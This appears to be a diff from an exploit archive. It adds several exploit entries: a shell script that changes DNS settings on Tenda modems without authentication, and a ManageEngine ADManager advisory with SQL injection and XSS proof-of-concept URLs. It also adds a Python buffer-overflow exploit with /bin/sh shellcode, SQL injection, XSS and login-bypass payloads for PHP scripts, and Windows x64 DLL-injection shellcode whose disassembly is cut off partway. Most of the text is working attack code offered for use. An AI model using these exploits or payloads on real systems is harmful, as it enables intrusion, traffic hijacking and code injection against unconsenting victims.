# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# The malicious code doesn't sleeping, he stalking..
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem D840R "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

191
platforms/java/webapps/41082.txt Executable file
View file

@ -0,0 +1,191 @@
1. ADVISORY INFORMATION
========================================
Title: ManagEnegine ADManager Plus <= 6.5.40 Multiple Vulnerabilities
Application: ManagEnegine Admanager
Remotely Exploitable: Yes
Authentication Required: Yes
Versions Affected: <= 6.5.40
Technology: Java
Vendor URL: https://www.manageengine.com/products/ad-manager/
Identified Issues Types: Reflected XSS(s), Authenticated Second Order SQL Injection
Author: Mehmet Ince
Date of found: 08 Jan 2017
2. CREDIT
========================================
Those vulnerabilities was identified during internal penetration test
by Mehmet INCE from PRODAFT / INVICTUS.
3. DETAILS
========================================
3.1 Authenticated Second Order SQL Injection
-----------------------------------------
AdventNetADSMClient.jar file contains DuplicateComputersListener class definition which is accessible with /Report.do enpoint.
start function of DuplicateComputerLİstener class is as follow (Irrelevant part are omitted.)
public void start(ArrayList attributeList, HttpServletRequest request, ReportBean bean)
{
try
{
... OMITTED ...
this.attrbId = request.getParameter("attrId");
this.tableName = request.getParameter("attrTabName");
this.attrbName = request.getParameter("attrbColName");
... OMITTED ...
}
catch (Exception e)
{
e.printStackTrace();
}
}
It takes user input without validation and set it directly to the class variables such as tableName, attrbName.
And then deriveData function are going to be called with class variables that under the adversary control
during complatedAction function execution.
public void completedAction()
{
if (this.updateDetails)
{
... OMITTED ...
deriveData(this.domainName, this.attrbId, this.attrbName, this.tableName);
... OMITTED ...
}
... OMITTED ...
}
deriveData function definition is as follow.
public void deriveData(String domainName, String attrbId, String attrbName, String tableName)
{
ArrayList list = new ArrayList();
RelationalAPI relationalAPI = RelationalAPI.getInstance();
Connection connection = null;
try
{
TableDefinition tableDef = MetaDataUtil.getTableDefinitionByName(tableName);
ColumnDefinition colDef = tableDef.getColumnDefinitionByName(attrbName);
String dataType = colDef.getDataType();
String selctAttrbCol_defaultValue = "'-'";
if (!dataType.equals("CHAR")) {
... OMITTED ...
}
String query = "select " + tableName + "." + attrbName + "," + tableName + ".domain_name " + " from " + tableName + " inner join " + this.resultTableName + " on " + tableName + ".object_guid=" + this.resultTableName + ".object_guid where " + tableName + "." + attrbName + "!=" + selctAttrbCol_defaultValue + " and " + tableName + ".domain_name='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + tableName + "." + attrbName + "," + tableName + ".domain_name having count(*) > 1;";
if (!tableName.equalsIgnoreCase(this.baseTableName))
{
String selctAttrbCol = tableName + "." + attrbName;
String parentAttrbCol = this.baseTableName + ".domain_name";
String parentTable = this.baseTableName;String childTable = tableName;
String parentJoinCol = this.baseTableName + ".object_guid";
String childJoinCol = tableName + ".object_guid";
String join = parentTable + " inner join " + childTable + " on " + parentJoinCol + " = " + childJoinCol + " inner join " + this.resultTableName + " on " + parentJoinCol + " = " + this.resultTableName + ".object_guid";
query = "select " + selctAttrbCol + "," + parentAttrbCol + " from " + join + " where " + selctAttrbCol + "!=" + selctAttrbCol_defaultValue + " and " + parentAttrbCol + "='" + domainName + "' and " + this.resultTableName + ".report_generation_id='" + this.generationId + "' group by " + selctAttrbCol + "," + parentAttrbCol + " having count(*) > 1;";
}
ArrayList result = getResult(query, attrbName);
ArrayList subList = new ArrayList();
if (result.size() > 0)
{
... OMITTED ...
}
if (subList.size() > 0)
{
... OMITTED ...
}
else
{
... OMITTED ...
}
}
catch (Exception e)
{
e.printStackTrace();
}
}
As you can see, database query built with user supplied variable without PDO/ORM.
POC URL : http://12.0.0.136:8080/Report.do?methodToCall=generateReport&action=Generate&domains=DC=acme,DC=local&&attrId=3001&attrTabName=1;%20SELECT%20pg_sleep(100);%20--&attrbColName=COMPUTER_NAME&attrbDispName=Computer%20Name
Vulnerable Parameters: attrTabName, attrbColName
IMPORTANT NOTE:
Since whole process are being called as background job, there is no way to successfully exploitation
with Blind and/or Time Based techniques. Since this application mostly runs on Windows operating systems, it's possible to
exfiltrate data with DNS queries.(http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281)
3.2 Reflected Cross-Site Scripting Issues
-----------------------------------------
Issue #1
POC URL : http://12.0.0.136:8080/ObjectProperties.do?selectedTab=home&guid={0622C4EE-51D8-4381-A1D9-05B66F10BA16}&domainName=12422'%3balert(1)%2f%2f166dlgck5&selectedObjectTab=properties&reportProperties=objectProperties&objectClass=computer&adscsrf=3b59a7c2-4cf4-4f3c-95e4-bfe41f76717a
Parameters: domainName
Issue #2
POC URL: http://12.0.0.136:8080/DelegationAudit.do?methodToCall=finish&selectedTab=delegation&selectedTile=delegationAudit&action='"--></style></scRipt><scRipt>alert(0x03279A)</scRipt>&init=true
Vulnerable Parameters: action
Issue #3
POC URL: http://12.0.0.136:8080/HDTTemplates.do?technicianId=1&domainName='"--></style></scRipt><scRipt>alert(0x0328D0)</scRipt>
Vulnerable Parameters: domainName
Issue #4
POC URL: http://12.0.0.136:8080/jsp/reports/ExportReport.jsp?reportList=true&reportId=43&waadAccId=/'onload='alert(9)
Vulnerable Parameters: waadAccId
Issue #5
POC URL: http://12.0.0.136:8080/MgmtAutomation.do?selectedTab=automation&selectedTile=mgmtAutomation&methodToCall=scheduledAutomationCreation&actionType='"--></style></scRipt><scRipt>alert(0x02CB72)</scRipt>
Vulnerable Parameters: actionType
Issue #6
POC URL: http://12.0.0.136:8080/ObjectProperties.do?guid={0262EDE4-B845-4E67-B926-BC89BC4DDCBF}&objectClass='"--></style></scRipt><scRipt>alert(0x013AEE)</scRipt>&domainName=acme.local&nodeClicked=DC=acme,DC=local&selectedObjectTab=properties&objectName=Builtin&adscsrf=
Vulnerable Parameters: objectClass, domainName
Issue #7
POC URL: http://12.0.0.136:8080/PopupInputSelection.do?methodToCall=selectContainer&domainName='"--></style></scRipt><scRipt>alert(0x025A20)</scRipt>&isWorkFlow=false&id=input2014&container=CN=Users,DC=acme,DC=local
Vulnerable Parameters: domainName, id, container
Issue #8
POC URL: http://12.0.0.136:8080/Report.do?selectedTab=reports&methodToCall=report&init=true&reportTab='"--></style></scRipt><scRipt>alert(0x00AE90)</scRipt>&tileName=Compliance Reports
Vulnerable Parameters: reportTab, tileName, categoryId,
Issue #9
POC URL: http://12.0.0.136:8080/AdvancedFilter.do?beanName=ReportBean&domainName='"--></style></scRipt><scRipt>alert(0x0376D4)</scRipt>&distinguishedName=DC=acme,DC=local
Vulnerable Parameters: domainName, distinguishedName
Issue #10
POC URL: http://12.0.0.136:8080/ViewSIDs.do?domainName='"--></style></scRipt><scRipt>alert(0x041BA0)</scRipt>&permissionType=folder
Vulnerable Parameters: permissionType, domianName
Issue #11
POC URL: http://12.0.0.136:8080/computerList.do?defaultNamingContext=DC=acme,DC=local&textField='"--></style></scRipt><scRipt>alert(0x042402)</scRipt>
Vulnerable Parameters: textField
Issue #12
POC URL: http://12.0.0.136:8080/ViewObjects.do?defaultNamingContext=x'" onmouseover=alert(9) &modelName=TreeModel&showDomains=false
Vulnerable Parameters: defaultNamingContext,modelName, showDomain
Issue #13
POC URL: http://12.0.0.136:8080/groupList.do?defaultNamingContext=DC=acme,DC=local&modifyType='"--></style></scRipt><scRipt>alert(0x0437B4)</scRipt>&beanName=undefined&type=single
Vulnerable Parameters: modifyType, beanName
4. TIMELINE
========================================
06 Jan 2017 - Netsparker identified several XSS vulnerabilities.
07 Jan 2017 - Further investigation done by INVICTUS/PRODAFT team.
07 Jan 2017 - SQL Injection identified by INVICTUS/PRODAFT team.
08 Jan 2017 - Details and short term mitigations are shared with members of GPACT/USTA platforms.
09 Jan 2017 - Vendor notified.
09 Jan 2017 - Vendor acknowledge the report.
13 Jan 2017 - Vendor replied with patch.
13 Jan 2017 - Patch verified by INVICTUS/PRODAFT team.
16 Jan 2017 - Advisory released (https://www.manageengine.com/products/ad-manager/release-notes.html)

63
platforms/linux/local/41076.py Executable file
View file

@ -0,0 +1,63 @@
# Exploit developed using Exploit Pack v7.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
jsacco@exploitpack.com
# Program affected: iSelect
# Affected value: -k, --key=KEY
# Version: 1.4.0-2+b1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: ncurses-based interactive line selection tool
# iSelect is an interactive line selection tool, operating via a
# full-screen Curses-based terminal session.
# Kali Linux 2.0 package: pool/main/i/iselect/iselect_1.4.0-2+b1_i386.deb
# MD5sum: d5ace58e0f463bb09718d97ff6516c24
# Website: http://www.ossp.org/pkg/tool/iselect/
# Where in the code:
#7 0xb7eaa69f in __strcpy_chk (dest=0xbfffeccc
"1\243\376\267\070\360\377\277", src=0xbffff388 "=", 'A' <repeats 199
times>..., destlen=1024) at strcpy_chk.c:30
#8 0x0804bfaa in ?? ()
#9 0x0804914d in ?? ()
#10 0xb7dcd276 in __libc_start_main (main=0x8048f50, argc=2,
argv=0xbffff224, init=0x804c020, fini=0x804c090, rtld_fini=0xb7fea8a0
<_dl_fini>, stack_end=0xbffff21c) at ../csu/libc-start.c:291
# Exploit code: Proof of Concept ( Without Fortify )
import os, subprocess
def run():
try:
print "# iSelect - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP
buffersize = 1024
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x08\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["iselect -k=",'', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, iSelect binary - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit iSelect - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()

26
platforms/php/webapps/41075.txt Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title : ----------- : Business Networking Script v8.11- SQLi &
Persistent Cross Site Scripting
# Author : ----------------- : Ahmet Gurel
# Google Dork : --------- : -
# Date : -------------------- : 16/01/2017
# Type : -------------------- : webapps
# Platform : --------------- : PHP
# Vendor Homepage : http://itechscripts.com/business-networking-script/
# Sofware Price and Demo : $299.00
http://professional-network.itechscripts.com
########## 1-SQL Injection ##########
##### Vulnerable Parameter Type : GET
##### Vulnerable Parameter : gid
##### Vulnerable URL :
http://localhost/[PATH]/show_group_members.php?gid=[SQLi]
##### SQLi Parameter : ' OR '1'='1
########## 2-Persistent XSS Payload ##########
##### Vulnerable URL : http://localhost/[PATH]/home.php
##### Vuln. Parameter: first_name=
##### PAYLOAD : '"--></style></Script><Script>alert(1)</Script>

64
platforms/php/webapps/41080.txt Executable file
View file

@ -0,0 +1,64 @@
Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
Author : Hasan Emre Ozer
Google Dork : -
Date : 16/01/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://itechscripts.com/image-sharing-script/
Sofware Price and Demo : $1250
http://photo-sharing.itechscripts.com/
--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/searchpin.php
Vulnerable Parameters : q=
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
Vulnerable Parameters: pid
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
-------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/categorypage.php
Vulnerable Parameters: token
Method: GET
Payload: ' AND (SELECT 2674 FROM(SELECT
COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
--------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/categorypage.php
Vulnerable Parameters : token
Payload:"><img src=i onerror=prompt(1)>
-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
Method: POST
Vulnerable Parameters : &text=
Payload:<img src=i onerror=prompt(1)>
--------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
Vulnerable Parameters: id
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
---------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
Vulnerable Parameters: brdId
Method: POST
Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
(ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH

12
platforms/php/webapps/41081.txt Executable file
View file

@ -0,0 +1,12 @@
# # # # #
# Vulnerability: Authentication Bypass
# Date: 16.01.2017
# Vendor Homepage: http://e-topbiz.com/
# Script Name: Million Pixels 3
# Script Buy Now: http://www.e-topbiz.com/oprema/pages/millionpixels3.php
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #

692
platforms/win_x86-64/shellcode/41072.c Executable file
View file

@ -0,0 +1,692 @@
/*
Title: Windows x64 dll injection shellcode (using CreateRemoteThread())
Size: 584 bytes
Date: 16-01-2017
Author: Roziul Hasan Khan Shifat
Tested On : Windows 7 x64
*/
//Note : i wrtie it for process injection
//It may work in exploit
/*
section .text
global _start
_start:
xor r8,r8
push r8
push r8
mov [rsp],dword 'expl'
mov [rsp+4],dword 'orer'
mov [rsp+8],dword '.exe'
lea rcx,[rsp] ;;process name (explorer.exe) change it if U want
push r8
push r8
push r8
mov [rsp],dword 'C:\U'
mov [rsp+4],dword 'sers'
mov [rsp+8],dword '\Pub'
mov [rsp+12],dword 'lic\'
mov [rsp+16],dword 'in.d'
mov [rsp+20],word 'll'
lea rdx,[rsp] ;path of the dll (change it to U full path of dll)
;--------------------------------------------------------
mov r8w,336
sub rsp,r8
lea r12,[rsp]
push 24
pop r8 ;(important: length of dll path string including null byte)
mov [r12],rcx ;process name
mov [r12+8],rdx ;dll path
mov [r12+16],r8 ;length of dll path string
;----------------------------------------------------------
_main:
cdq
mov rax,[gs:rdx+0x60] ;peb
mov rax,[rax+0x18] ;peb->Ldr
mov rsi,[rax+0x10] ;peb->Ldr.InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;rdi=kernel32.dll base address
;------------------------------------------
mov dl,0x88
mov ebx,[rdi+0x3c] ;DOS_HEADER->elf_anew
add rbx,rdi ;IMAGE_OPTIONAL_HEADER32
mov ebx,[rbx+rdx] ;IMAGE_DATA_DIRECTORY->VirtualAddress
add rbx,rdi ;IMAGE_EXPORT_DIRECTORY (Export table of kernel32.dll)
mov esi,[rbx+0x1c] ;kenrel32.dll AddressOfFunction
add rsi,rdi
;-------------------------------------------------------
;loading msvcrt.dll
cdq
push rdx
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,rdi
mov [rsp],dword 'msvc'
mov [rsp+4],word 'rt'
lea rcx,[rsp]
sub rsp,88
call rbx
;-------------------------------
;Finding address of strcmp()
lea rdx,[rsp+88]
mov [rdx],dword 'strc'
mov [rdx+4],word 'mp'
mov rcx,rax
mov r8w,587*4
mov ebx,[rsi+r8]
add rbx,rdi
call rbx
;-----------------------------
mov [r12+24],rax ;address of strcmp()
;---------------------------------------------------------------
mov dx,190*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateToolhelp32Snapshot()
;--------------------------------
;HANDLE WINAPI CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
xor rdx,rdx ;DWORD th32ProcessID
push 2
pop rcx ;DWORD dwFlags
call rbx
mov r13,rax ;HANDLE
cmp r13,-1
je __exit
;---------------------------------------------
mov dx,304
mov [r12+32],dword edx ;sizeof PROCESSENTRY32
mov dx,920*4
mov ebx,[rsi+rdx]
add rbx,rdi ;rbx=Process32First()
;WINBOOL WINAPI Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
lea rdx,[r12+32] ;LPPROCESSENTRY32 lppe
mov rcx,r13 ;HANDLE hSnapshot
call rbx
cmp rax,1
jne __exit
;---------------------------------------------------
xor rdx,rdx
mov dx,922*4
mov r15d,[rsi+rdx]
add r15,rdi ;r15=Process32Next()
sub rsp,88
get_pid:
lea rcx,[r12+76] ;PROCESSENRY32.CHAR szExeFile[MAX_PATH=260]
mov rdx,[r12] ;process name
mov rbx,[r12+24] ;strcmp()
call rbx
xor rdx,rdx
cmp rax,rdx
jz inject
;WINBOOL WINAPI Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
mov rcx,r13
lea rdx,[r12+32]
call r15
cmp rax,1
je get_pid
leave
ret
__exit:
xor rdx,rdx
push rdx
mov dx,297*4
mov ebx,[rsi+rdx]
add rbx,rdi
pop rcx
call rbx
;--------------------------------------------------
;------------------------------------------------------
;inject function
inject:
xor rdx,rdx
push rdx
pop r10
mov r10w,899*4
mov ebx,[rsi+r10]
add rbx,rdi ;rbx=OpenProcess()
;WINBASEAPI HANDLE WINAPI OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId)
push rdx
pop rcx
mov r8d,[r12+40] ;PROCESSENTRY32.DWORD th32ProcessID
;0x1e84800a-0x1e65700b=2035711 (PROCESS_ALL_ACCESS)
mov ecx,0x1e84800a
sub ecx,0x1e65700b
call rbx
mov r13,rax ;PROCESS HANDLE
cmp r13,-1
je __exit
;--------------------------------------------------------------------
mov dx,1279
mov ebx,[rsi+rdx*4]
add rbx,rdi ;VirualAlloc()
;WINBASEAPI LPVOID WINAPI VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
sub rsp,88
mov rcx,r13 ;HANDLE hProcess
xor rdx,rdx ;LPVOID lpAddress
mov r8,[r12+16] ;SIZE_T dwSize
mov r9w,0x2fff
inc r9;DWORD flAllocationType = (MEM_COMMIT | MEM_RESERVE)
mov [rsp+32],byte 0x4 ;DWORD flProtect = PAGE_READWRITE
call rbx
mov r14,rax ;LPVOID address
xor rdx,rdx
cmp rax,rdx
jz __exit
;-----------------------------------------------------------------------------------
mov dx,1347
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WriteProcessMemory()
sub rsp,88
xor rdx,rdx
;WINBASEAPI WINBOOL WINAPI WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten)
mov [rsp+32],rdx ;SIZE_T *lpNumberOfBytesWritten
mov rcx,r13 ;HANDLE hProcess
mov rdx,r14 ;LPVOID lpBaseAddress
mov r8,[r12+8] ;LPCVOID lpBuffer
mov r9,[r12+16] ;SIZE_T nSize
call rbx
cmp rax,1
jne __exit
;------------------------------------------------------------------------------------
mov dx,170*4
mov ebx,[rsi+rdx]
add rbx,rdi ;CreateRemoteThread()
xor rdx,rdx
sub rsp,88
;WINBASEAPI HANDLE WINAPI CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId)
mov rcx,r13 ;HANDLE hProcess
push rdx
push rdx
pop r8 ;SIZE_T dwStackSize
mov dx,832
mov r9d,[rsi+rdx*4]
add r9,rdi ;LPTHREAD_START_ROUTINE lpStartAddress (LoadLibraryA())
pop rdx ;LPSECURITY_ATTRIBUTES lpThreadAttributes
mov [rsp+32],r14 ;LPVOID lpParameter
mov [rsp+40],r8
mov [rsp+48],r8
call rbx
call __exit
;------------------------------------------------------------
*/
/*
dll_inj.obj: file format pe-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 4d 31 c0 xor %r8,%r8
3: 41 50 push %r8
5: 41 50 push %r8
7: c7 04 24 65 78 70 6c movl $0x6c707865,(%rsp)
e: c7 44 24 04 6f 72 65 movl $0x7265726f,0x4(%rsp)
15: 72
16: c7 44 24 08 2e 65 78 movl $0x6578652e,0x8(%rsp)
1d: 65
1e: 48 8d 0c 24 lea (%rsp),%rcx
22: 41 50 push %r8
24: 41 50 push %r8
26: 41 50 push %r8
28: c7 04 24 43 3a 5c 55 movl $0x555c3a43,(%rsp)
2f: c7 44 24 04 73 65 72 movl $0x73726573,0x4(%rsp)
36: 73
37: c7 44 24 08 5c 50 75 movl $0x6275505c,0x8(%rsp)
3e: 62
3f: c7 44 24 0c 6c 69 63 movl $0x5c63696c,0xc(%rsp)
46: 5c
47: c7 44 24 10 69 6e 2e movl $0x642e6e69,0x10(%rsp)
4e: 64
4f: 66 c7 44 24 14 6c 6c movw $0x6c6c,0x14(%rsp)
56: 48 8d 14 24 lea (%rsp),%rdx
5a: 66 41 b8 50 01 mov $0x150,%r8w
5f: 4c 29 c4 sub %r8,%rsp
62: 4c 8d 24 24 lea (%rsp),%r12
66: 6a 18 pushq $0x18
68: 41 58 pop %r8
6a: 49 89 0c 24 mov %rcx,(%r12)
6e: 49 89 54 24 08 mov %rdx,0x8(%r12)
73: 4d 89 44 24 10 mov %r8,0x10(%r12)
0000000000000078 <_main>:
78: 99 cltd
79: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
7e: 48 8b 40 18 mov 0x18(%rax),%rax
82: 48 8b 70 10 mov 0x10(%rax),%rsi
86: 48 ad lods %ds:(%rsi),%rax
88: 48 8b 30 mov (%rax),%rsi
8b: 48 8b 7e 30 mov 0x30(%rsi),%rdi
8f: b2 88 mov $0x88,%dl
91: 8b 5f 3c mov 0x3c(%rdi),%ebx
94: 48 01 fb add %rdi,%rbx
97: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
9a: 48 01 fb add %rdi,%rbx
9d: 8b 73 1c mov 0x1c(%rbx),%esi
a0: 48 01 fe add %rdi,%rsi
a3: 99 cltd
a4: 52 push %rdx
a5: 66 ba 40 03 mov $0x340,%dx
a9: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
ac: 48 01 fb add %rdi,%rbx
af: c7 04 24 6d 73 76 63 movl $0x6376736d,(%rsp)
b6: 66 c7 44 24 04 72 74 movw $0x7472,0x4(%rsp)
bd: 48 8d 0c 24 lea (%rsp),%rcx
c1: 48 83 ec 58 sub $0x58,%rsp
c5: ff d3 callq *%rbx
c7: 48 8d 54 24 58 lea 0x58(%rsp),%rdx
cc: c7 02 73 74 72 63 movl $0x63727473,(%rdx)
d2: 66 c7 42 04 6d 70 movw $0x706d,0x4(%rdx)
d8: 48 89 c1 mov %rax,%rcx
db: 66 41 b8 2c 09 mov $0x92c,%r8w
e0: 42 8b 1c 06 mov (%rsi,%r8,1),%ebx
e4: 48 01 fb add %rdi,%rbx
e7: ff d3 callq *%rbx
e9: 49 89 44 24 18 mov %rax,0x18(%r12)
ee: 66 ba f8 02 mov $0x2f8,%dx
f2: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
f5: 48 01 fb add %rdi,%rbx
f8: 48 31 d2 xor %rdx,%rdx
fb: 6a 02 pushq $0x2
fd: 59 pop %rcx
fe: ff d3 callq *%rbx
100: 49 89 c5 mov %rax,%r13
103: 49 83 fd ff cmp $0xffffffffffffffff,%r13
107: 74 60 je 169 <__exit>
109: 66 ba 30 01 mov $0x130,%dx
10d: 41 89 54 24 20 mov %edx,0x20(%r12)
112: 66 ba 60 0e mov $0xe60,%dx
116: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
119: 48 01 fb add %rdi,%rbx
11c: 49 8d 54 24 20 lea 0x20(%r12),%rdx
121: 4c 89 e9 mov %r13,%rcx
124: ff d3 callq *%rbx
126: 48 83 f8 01 cmp $0x1,%rax
12a: 75 3d jne 169 <__exit>
12c: 48 31 d2 xor %rdx,%rdx
12f: 66 ba 68 0e mov $0xe68,%dx
133: 44 8b 3c 16 mov (%rsi,%rdx,1),%r15d
137: 49 01 ff add %rdi,%r15
13a: 48 83 ec 58 sub $0x58,%rsp
000000000000013e <get_pid>:
13e: 49 8d 4c 24 4c lea 0x4c(%r12),%rcx
143: 49 8b 14 24 mov (%r12),%rdx
147: 49 8b 5c 24 18 mov 0x18(%r12),%rbx
14c: ff d3 callq *%rbx
14e: 48 31 d2 xor %rdx,%rdx
151: 48 39 d0 cmp %rdx,%rax
154: 74 24 je 17a <inject>
156: 4c 89 e9 mov %r13,%rcx
159: 49 8d 54 24 20 lea 0x20(%r12),%rdx
15e: 41 ff d7 callq *%r15
161: 48 83 f8 01 cmp $0x1,%rax
165: 74 d7 je 13e <get_pid>
167: c9 leaveq
168: c3 retq
0000000000000169 <__exit>:
169: 48 31 d2 xor %rdx,%rdx
16c: 52 push %rdx
16d: 66 ba a4 04 mov $0x4a4,%dx
171: 8b 1c 16 mov (%rsi,%rdx,1),%ebx
174: 48 01 fb add %rdi,%rbx
177: 59 pop %rcx
178: ff d3 callq *%rbx
000000000000017a <inject>:
17a: 48 31 d2 xor %rdx,%rdx
17d: 52 push %rdx
17e: 41 5a pop %r10
180: 66 41 ba 0c 0e mov $0xe0c,%r10w
185: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx
189: 48 01 fb add %rdi,%rbx
18c: 52 push %rdx
18d: 59 pop %rcx
18e: 45 8b 44 24 28 mov 0x28(%r12),%r8d
193: b9 0a 80 84 1e mov $0x1e84800a,%ecx
198: 81 e9 0b 70 65 1e sub $0x1e65700b,%ecx
19e: ff d3 callq *%rbx
1a0: 49 89 c5 mov %rax,%r13
1a3: 49 83 fd ff cmp $0xffffffffffffffff,%r13
1a7: 74 c0 je 169 <__exit>
1a9: 66 ba ff 04 mov $0x4ff,%dx
1ad: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1b0: 48 01 fb add %rdi,%rbx
1b3: 48 83 ec 58 sub $0x58,%rsp
1b7: 4c 89 e9 mov %r13,%rcx
1ba: 48 31 d2 xor %rdx,%rdx
1bd: 4d 8b 44 24 10 mov 0x10(%r12),%r8
1c2: 66 41 b9 ff 2f mov $0x2fff,%r9w
1c7: 49 ff c1 inc %r9
1ca: c6 44 24 20 04 movb $0x4,0x20(%rsp)
1cf: ff d3 callq *%rbx
1d1: 49 89 c6 mov %rax,%r14
1d4: 48 31 d2 xor %rdx,%rdx
1d7: 48 39 d0 cmp %rdx,%rax
1da: 74 8d je 169 <__exit>
1dc: 66 ba 43 05 mov $0x543,%dx
1e0: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
1e3: 48 01 fb add %rdi,%rbx
1e6: 48 83 ec 58 sub $0x58,%rsp
1ea: 48 31 d2 xor %rdx,%rdx
1ed: 48 89 54 24 20 mov %rdx,0x20(%rsp)
1f2: 4c 89 e9 mov %r13,%rcx
1f5: 4c 89 f2 mov %r14,%rdx
1f8: 4d 8b 44 24 08 mov 0x8(%r12),%r8
1fd: 4d 8b 4c 24 10 mov 0x10(%r12),%r9
202: ff d3 callq *%rbx
